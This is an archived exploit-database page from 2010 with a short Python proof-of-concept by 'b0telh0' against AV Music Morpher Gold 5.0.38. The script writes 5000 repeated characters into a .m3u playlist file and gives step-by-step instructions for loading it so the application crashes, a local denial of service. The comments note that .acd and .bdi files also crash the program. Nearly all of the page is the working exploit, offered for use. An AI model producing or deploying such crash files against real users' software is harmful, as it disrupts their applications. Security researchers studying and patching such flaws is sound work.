AV Music Morpher Gold 5.0.38 (.m3u) Denial of Service
Posted on 20 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>AV Music Morpher Gold 5.0.38 (.m3u) Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================== AV Music Morpher Gold 5.0.38 (.m3u) Denial of Service ===================================================== #!/usr/bin/python # # Exploit Title: AV Music Morpher Gold (.m3u) Local Crash PoC # Date: 08-20-2010 # Author: b0telh0 # Software Link: http://www.musicmorpher.com/download.php?product=musicgold # Version: 5.0.38 # Tested on: Windows XP SP3 (pt-br) VirtualBox # # *.acd and *.bdi files will crash the application too! crash = "x41" * 5000 try: file = open('b0t.m3u','w'); file.write(crash); file.close(); print " [+] b0t.m3u created." print "[+] Burner > Create New Audio CD > Right click and 'Add playlist'" print "[+] Select b0t.m3u and boom. " except: print " [-] Error.. Error.. Error.. Error.. " # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>